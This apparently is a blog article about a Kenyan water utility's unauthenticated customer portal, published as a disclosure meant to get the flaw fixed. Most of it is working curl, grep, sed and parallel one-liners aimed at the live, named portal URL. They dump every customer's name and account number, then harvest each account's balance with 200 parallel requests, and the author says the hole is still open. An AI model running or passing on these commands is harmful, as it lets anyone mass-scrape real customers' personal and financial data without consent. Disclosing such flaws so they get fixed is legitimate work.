Brian Onang'o

Using Bash to Scrape Data from Mombasa Water Portal

This article documents some poor practices found in publicly accessible IT systems, together with proof-of-concept tools that exploit them, with a view to having the bugs fixed and raising the standard of software engineering practice in Kenya.

Of the many water and sanitation companies in Kenya, Mombasa Water and Nairobi Water seem to be among the few, if not the only ones, that have digitized their records and provided an online portal where customers can check them. Mombasa Water, however, in classic style, has implemented its system in such a buggy way that it exposes all the accounts and their balances to the public. More than a year later, the bug remains unfixed.

The portal itself does not use any authentication. This seems to be common practice among water and other utility providers, seeing as the KPLC self-service portal is designed in almost the same way. KPLC, however, implements some authentication: a token is required to access the API endpoint that returns data for a specific meter. But this token is not generated from the user's credentials, so it provides security only against bots.

KPLC self service portal

The KPLC portal allows a user to query data for a specific meter number or account number. It is the same with the Mombasa Water portal. Since it is very difficult to guess an account number or a meter number, these systems provide some rudimentary protection against exposing all user data. KPLC has another trick. While the call to the API returns the name of the account holder along with the other information, the name is filtered out and not shown in the table of records displayed in the UI. This suggests that KPLC has some concern about making all of this information public. Whether there are already data laws that forbid such a practice, we know not. But we know that exposing this information is surely a violation of the privacy of its users.

But the designers and implementers of the Mombasa Water portal are even worse. Their system does not even seem to have an API. To query it, you send a POST request to the page https://portal.mombasawater.co.ke/index.php with the form field search=ACCOUNT_NUMBER. This can be done in bash using curl:

curl --data "search=ACCOUNT_NUMBER" https://portal.mombasawater.co.ke/index.php

This lacks even the basic protection that the KPLC system provides against bots that guess account numbers by brute force.

Supplying a single space character as the account number returns a list with the customer name and account number of every account.

curl --data "search= " https://portal.mombasawater.co.ke/index.php

To extract just the account number and customer name from the response, we use grep and sed:

curl --data "search= " https://portal.mombasawater.co.ke/index.php | grep -o "Account Number.*" | sed -e 's/Customer Name:<div>/:/' | sed -e 's/Account Number:<div>//' |grep -o "[0-9]*:.*"

To sort the data and save to a text file:

curl --data "search= " https://portal.mombasawater.co.ke/index.php | grep -o "Account Number.*" | sed -e 's/Customer Name:<div>/:/' | sed -e 's/Account Number:<div>//' |grep -o "[0-9]*:.*" |sort > mw.txt

Fetching Account Balances

Account balances can be fetched by entering the account number into the Account Number field of the form on the portal.

This task can also be automated using bash. For a single account:

curl --data "search=ACCOUNT_NUMBER" https://portal.mombasawater.co.ke/index.php|grep -o "Customer Name:.*\|Account Number:.*\|Balance:.*"  | sed -e 's/<[^>]*>//g' | sed -e 's/\(Balance[^ ]*\) .*/\1/' | tr -d '\r\n' | sed 's/Customer Name:\(.*\)Account Number:\([0-9]*\)Balance:\(.*\)/\2:\3:\1/'
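
To make the parsing steps easier to follow, here is a minimal sketch that runs the same grep, sed and tr stages on a local string instead of the live portal. The HTML fragment, the name and the account number are invented for illustration; the real page markup may well differ.

```shell
# Hypothetical HTML fragment (an assumption, not the portal's real markup).
sample='<p>Customer Name:<div>JANE DOE</div></p>
<p>Account Number:<div>1234567</div></p>
<p>Balance:<div>1500.00</div> KES</p>'

record="$(printf '%s\n' "$sample" \
  | grep -o "Customer Name:.*\|Account Number:.*\|Balance:.*" \
  | sed -e 's/<[^>]*>//g' \
  | sed -e 's/\(Balance[^ ]*\) .*/\1/' \
  | tr -d '\r\n' \
  | sed 's/Customer Name:\(.*\)Account Number:\([0-9]*\)Balance:\(.*\)/\2:\3:\1/')"

# Stage by stage: keep only the three labelled fields, strip the tags,
# cut the balance at the first space, join the lines into one, then
# reorder the fields as account:balance:name.
printf '%s\n' "$record"
```

With this sample the sketch prints 1234567:1500.00:JANE DOE. The `\|` alternation in grep is a GNU extension, so this assumes GNU grep.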

For all accounts, saving the results to a text file whose name has the format YYYY-MM-DDhh:mm:ss.balances:

cat mw.txt | sed -e 's/:.*//g' | parallel -j200 "curl -sS --data \"search={}\" https://portal.mombasawater.co.ke/index.php | grep -o \"Customer Name:.*\|Account Number:.*\|Balance:.*\" | sed -e 's/<[^>]*>//g' | sed -e 's/\(Balance[^ ]*\) .*/\1/' |  tr -d '\r\n'|sed -e 's/\(Customer Name\)/\n\r\1/g' | sed -e 's/Customer Name:\(.*\)Account Number:\(.*\)Balance:\(.*\)/\2:\3:\t\1/g' >> \"$(date +\"%F%T\").balances\" && echo {#}"
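
The file name in the command above comes from `date` with the `%F%T` format. A minimal sketch of just that step is shown here; the variable names `stamp` and `outfile` are illustrative and do not appear in the original command.

```shell
# %F expands to YYYY-MM-DD and %T to hh:mm:ss, with nothing in between.
stamp="$(date +%F%T)"

# Build the name once so that every append lands in the same file.
outfile="${stamp}.balances"

printf '%s\n' "$outfile"
```

In the command above the `$(date ...)` substitution sits inside the double-quoted string passed to parallel, so it appears to be expanded once by the calling shell before any job starts, which is why all jobs append to a single file. Note that colons in file names are not accepted on every file system.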

The two steps combined into a one-liner:

curl --data "search= " https://portal.mombasawater.co.ke/index.php | grep -o "Account Number.*" | sed -e 's/Customer Name:<div>/:/' | sed -e 's/Account Number:<div>//' |grep -o "[0-9]*:.*" |sort | sed -e 's/:.*//g' | parallel -j200 "curl -sS --data \"search={}\" https://portal.mombasawater.co.ke/index.php | grep -o \"Customer Name:.*\|Account Number:.*\|Balance:.*\" | sed -e 's/<[^>]*>//g' | sed -e 's/\(Balance[^ ]*\) .*/\1/' |  tr -d '\r\n'|sed -e 's/\(Customer Name\)/\n\r\1/g' | sed -e 's/Customer Name:\(.*\)Account Number:\(.*\)Balance:\(.*\)/\2:\3:\t\1/g' >> \"$(date +\"%F%T\").balances\" && echo {#}"

With that single line, a malicious actor is able to get the balance records of Mombasa Water, with the names for all accounts, as frequently as he likes and use that data for whatever on earth it can be used for. Our solution to this challenge, as well as for helping other WASH players get up to speed with technological advancements, is openWASH, the open-source WASH Management Information System. It may be several months or years away, but it is well in the pipeline.